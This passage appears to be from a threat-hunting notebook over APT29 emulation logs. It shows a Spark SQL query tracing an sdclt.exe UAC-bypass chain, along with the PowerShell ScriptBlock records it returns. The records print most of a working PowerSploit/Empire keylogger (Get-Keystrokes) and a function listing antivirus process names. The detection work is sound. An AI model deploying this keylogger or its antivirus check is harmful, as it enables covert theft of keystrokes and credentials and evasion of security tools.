            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Keystroke-Check {
    Get-Process | Where-Object { $_.ProcessName -Eq "avp" -or $_.ProcessName -Eq "acs" -or $_.ProcessName -Eq "outpost" -or $_.ProcessName -Eq "mcvsescn" -or $_.ProcessName -Eq "mcods" -or $_.ProcessName -Eq "navapsvc" -or $_.ProcessName -Eq "kav" -or $_.ProcessName -Eq "AvastSvc" -or $_.ProcessName -Eq "AvastUi" -or $_.ProcessName -Eq "nod32krn" -or $_.ProcessName -Eq "nod32" -or $_.ProcessName -Eq "ekern" -or $_.ProcessName -Eq "dwengine" -or $_.ProcessName -Eq "MsMpEng" -or $_.ProcessName -Eq "msseces" -or $_.ProcessName -Eq "ekrn" -or $_.ProcessName -Eq "savservice" -or $_.ProcessName -Eq "scfservice" -or $_.ProcessName -Eq "savadminservice" }
}

ScriptBlock ID: a2a6be75-3568-4d81-a0ca-40a31de44589
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
get-process

ScriptBlock ID: 66a7f650-8a84-4dcf-a0f7-41d06de51f5c
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

Query ID:294DFB34-1FA8-464D-B85C-F2AE163DB4A9

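# Spark SQL lookup: PowerShell ScriptBlock-logging events (EventID 4104) whose
# text contains "get-process", restricted to powershell.exe instances that
# descend from the sdclt.exe -> control.exe chain examined earlier in this
# notebook. Reading the join chain from the innermost subquery outward, all
# process-creation lookups are Security-channel EventID 4688 records:
#   b: control.exe whose parent is sdclt.exe            -> its NewProcessId
#   a: processes created by that control.exe (a.ProcessId = b.NewProcessId),
#      kept only when they run at High integrity (S-1-16-12288 is the
#      well-known High Mandatory Level SID) with a full elevated token
#      (%%1937 is the TokenElevationTypeFull message id)
#   d: powershell.exe created by that elevated process, with the "0x" prefix
#      stripped from NewProcessId so it can be compared as bare hex (e)
#   f: 4104 ScriptBlock events whose integer ExecutionProcessID, rendered with
#      hex() and lower-cased, equals that bare-hex process id.
#
# Fix: every other image-path comparison in the query is case-folded with
# LOWER(); the powershell.exe test was the only case-sensitive one, so a
# differently-cased image name (Windows paths are case-insensitive) would have
# silently dropped the whole chain.
# NOTE(review): hex() emits no leading zeros and the 4688 NewProcessId is
# assumed to carry none either — confirm against the data if matches go missing.
query = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%get-process%"

'''
df = spark.sql(query)
# Vertical, untruncated output so the full ScriptBlockText of each hit is readable.
df.show(100, truncate=False, vertical=True)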
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
